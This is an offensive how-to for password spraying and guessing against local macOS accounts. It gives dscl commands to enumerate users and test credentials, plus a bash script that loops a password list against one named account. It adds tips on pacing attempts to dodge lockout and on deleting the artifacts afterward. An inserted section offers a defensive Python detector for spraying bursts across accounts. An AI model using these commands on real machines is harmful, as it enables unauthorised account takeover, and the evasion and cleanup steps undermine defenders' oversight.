Password Spraying
A password spraying attack involves attempting a single password across multiple user accounts to avoid account lockouts. This attack can target local accounts on a macOS system.
Prerequisites
- A list of valid usernames.
- A single password or a small set of passwords for spraying.
Gather a User List (if needed)
dscl . list /Users
Save the list to a file for iteration:
dscl . list /Users > userlist.txt
Performing the Password Spraying Attack
The dscl command can be used to authenticate users:
dscl . auth <username> <password>
Successful output indicates valid credentials.
Automating the Spraying
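Write a script to iterate through passwords with a single username. Because it tests many passwords against one account, this loop is per-account password guessing rather than spraying as defined above, and it is the pattern per-account lockout counters are built to catch: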
#!/bin/bash
username="steve"
passwordlist="passwords.txt"
while IFS= read -r password; do
  echo -n "[+] Testing password: $password ......"
  dscl . auth "$username" "$password" &>/dev/null && echo "Success $username:$password" || echo "Failed"
done < "$passwordlist"
Save the script as spray.sh and make it executable:
chmod +x spray.sh
Run the script:
./spray.sh
Monitoring and Avoiding Detection
Bypass Detection
- Test one password at a time across multiple accounts to avoid lockouts.
- Introduce delays between attempts:
sleep 5
Monitor for Detection
Check logs for unusual activity:
sudo tail -f /var/log/system.log | grep -i "authentication"
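From the defender's side, one attempt per account with delays in between stays under per-account lockout thresholds, so detection has to count distinct failing accounts across a time window. The Python below is an added example, not part of the original page; the "timestamp user result" event format and the sample lines are constructed, and it assumes authentication results have already been exported from the host's logs and normalized to that format.

```python
from collections import deque
from datetime import datetime, timedelta

# Constructed, normalized events (NOT real macOS log output): "timestamp user result"
SAMPLE = """\
2024-05-01T10:00:00 alice FAIL
2024-05-01T10:00:05 bob FAIL
2024-05-01T10:00:10 carol FAIL
2024-05-01T10:00:15 dave FAIL
2024-05-01T10:00:20 erin FAIL
2024-05-01T10:00:25 steve OK
2024-05-01T14:00:00 alice FAIL
2024-05-01T14:00:09 alice OK
"""

def parse(text):
    """Return time-sorted (datetime, user, result) tuples; skip lines without three valid fields."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[2] in ("OK", "FAIL"):
            events.append((datetime.fromisoformat(parts[0]), parts[1], parts[2]))
    return sorted(events)

def lockout_hits(events, threshold=3):
    """Accounts that a per-account failure counter would flag."""
    counts = {}
    for _, user, result in events:
        if result == "FAIL":
            counts[user] = counts.get(user, 0) + 1
    return sorted(u for u, n in counts.items() if n >= threshold)

def spray_alerts(events, window=timedelta(minutes=10), min_users=5):
    """One alert per burst in which >= min_users distinct accounts fail inside `window`."""
    recent, alerts, active = deque(), [], False
    for ts, user, result in events:
        if result != "FAIL":
            continue
        recent.append((ts, user))
        while ts - recent[0][0] > window:  # drop failures older than the window
            recent.popleft()
        users = sorted({u for _, u in recent})
        if len(users) >= min_users and not active:
            alerts.append({"start": recent[0][0], "end": ts, "users": users})
        active = len(users) >= min_users
    return alerts

if __name__ == "__main__":
    ev = parse(SAMPLE)
    print("per-account lockout hits:", lockout_hits(ev))
    for a in spray_alerts(ev):
        print("possible spray:", a["start"], "->", a["end"], a["users"])
```

On the sample, the per-account counter flags nothing while the cross-account window raises one alert; the window should be set longer than the slowest pacing you want to catch.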
Post-Attack Cleanup
- Remove user lists or any generated artifacts:
rm userlist.txt spray.sh
Notes:
- Local accounts may have stronger password policies or different authentication mechanisms.
- macOS has built-in protections, such as account lockout and delayed authentication responses, which may hinder spraying attempts.